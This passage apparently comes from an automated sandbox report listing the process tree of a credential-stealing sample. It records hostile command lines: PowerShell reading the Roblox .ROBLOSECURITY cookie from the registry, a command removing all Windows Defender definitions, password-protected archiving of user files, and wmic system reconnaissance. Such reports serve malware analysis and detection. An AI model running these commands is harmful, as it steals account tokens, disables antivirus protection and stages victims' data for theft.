                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:getmac
                                                                                                                                                                                                                                      Imagebase:0x7ff7fd0f0000
                                                                                                                                                                                                                                      File size:90'112 bytes
                                                                                                                                                                                                                                      MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:52
                                                                                                                                                                                                                                      Start time:03:42:11
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:53
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:54
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:55
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:56
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:57
                                                                                                                                                                                                                                      Start time:03:42:12
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:58
                                                                                                                                                                                                                                      Start time:03:42:13
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
                                                                                                                                                                                                                                      Imagebase:0x7ff7c2690000
                                                                                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:59
                                                                                                                                                                                                                                      Start time:03:42:13
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:60
                                                                                                                                                                                                                                      Start time:03:42:13
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:61
                                                                                                                                                                                                                                      Start time:03:42:14
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:63
                                                                                                                                                                                                                                      Start time:03:42:14
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:64
                                                                                                                                                                                                                                      Start time:03:42:15
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:65
                                                                                                                                                                                                                                      Start time:03:42:15
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:66
                                                                                                                                                                                                                                      Start time:03:42:15
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:67
                                                                                                                                                                                                                                      Start time:03:42:19
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                      Imagebase:0x7ff6a5480000
                                                                                                                                                                                                                                      File size:468'120 bytes
                                                                                                                                                                                                                                      MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:68
                                                                                                                                                                                                                                      Start time:03:42:26
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:69
                                                                                                                                                                                                                                      Start time:03:42:26
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:70
                                                                                                                                                                                                                                      Start time:03:42:26
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
                                                                                                                                                                                                                                      Imagebase:0x7ff6aa180000
                                                                                                                                                                                                                                      File size:630'736 bytes
                                                                                                                                                                                                                                      MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:71
                                                                                                                                                                                                                                      Start time:03:42:27
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:72
                                                                                                                                                                                                                                      Start time:03:42:27
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:73
                                                                                                                                                                                                                                      Start time:03:42:27
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic os get Caption
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:74
                                                                                                                                                                                                                                      Start time:03:42:28
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:75
                                                                                                                                                                                                                                      Start time:03:42:28
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:76
                                                                                                                                                                                                                                      Start time:03:42:28
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:77
                                                                                                                                                                                                                                      Start time:03:42:29
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:78
                                                                                                                                                                                                                                      Start time:03:42:29
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:79
                                                                                                                                                                                                                                      Start time:03:42:29
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                      Imagebase:0x7ff69e180000
                                                                                                                                                                                                                                      File size:576'000 bytes
                                                                                                                                                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:80
                                                                                                                                                                                                                                      Start time:03:42:30
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:81
                                                                                                                                                                                                                                      Start time:03:42:30
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:82
                                                                                                                                                                                                                                      Start time:03:42:30
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:83
